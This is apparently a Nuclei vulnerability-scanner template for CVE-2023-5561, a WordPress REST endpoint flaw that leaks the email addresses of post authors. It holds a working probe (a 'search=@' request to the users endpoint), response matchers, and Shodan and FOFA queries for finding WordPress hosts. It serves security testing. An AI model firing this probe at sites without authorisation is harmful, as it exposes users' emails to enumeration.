67 lines
2.3 KiB
YAML
67 lines
2.3 KiB
YAML
id: CVE-2023-5561
|
|
|
|
info:
|
|
name: WordPress Core - Post Author Email Disclosure
|
|
author: nqdung2002
|
|
severity: medium
|
|
description: |
|
|
WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the 'list_users' capability, the search is applied to the user_email column.
|
|
impact: |
|
|
This can allow unauthenticated attackers to brute force or verify the email addresses of users with published posts or pages on the site.
|
|
reference:
|
|
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-470-631-sensitive-information-exposure-via-user-search-rest-endpoint?asset_slug=wordpress
|
|
- https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-5561
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2023-5561
|
|
cwe-id: CWE-200
|
|
epss-score: 0.00072
|
|
epss-percentile: 0.32109
|
|
cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: wordpress
|
|
product: wordpress
|
|
framework: wordpress
|
|
shodan-query:
|
|
- cpe:"cpe:2.3:a:wordpress:wordpress"
|
|
- http.component:"wordpress"
|
|
fofa-query: body="oembed" && body="wp-"
|
|
tags: cve,cve2023,wpscan,disclosure,wp,wordpress,email,exposure
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body, "/wp-content/plugins")'
|
|
internal: true
|
|
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/{{route}}search=@"
|
|
|
|
stop-at-first-match: true
|
|
payloads:
|
|
route:
|
|
- "wp-json/wp/v2/users?"
|
|
- "?rest_route=/wp/v2/users&"
|
|
attack: clusterbomb
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "application/json")'
|
|
- 'contains_all(body, "[{\"id", "name\":", "@")'
|
|
condition: and
|
|
# digest: 490a004630440220628e676e9da493d7e5323dfd1ff0a16ddee0a8507691358b486cc9a14729743102207edca00957368f29586561dc14f5081c99389e4635da39a7f27a5401076a1183:922c64590222798bb761d5b6d8e72950 |